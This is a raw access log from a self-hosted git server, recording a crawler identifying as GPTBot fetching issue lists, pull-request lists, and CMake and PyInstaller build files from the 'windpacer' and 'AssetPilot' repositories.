[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13624] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12798] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12874] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11631] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35758] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 20002] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13624] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12797] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:19:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:19:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:19:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11767] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11287] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:19:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 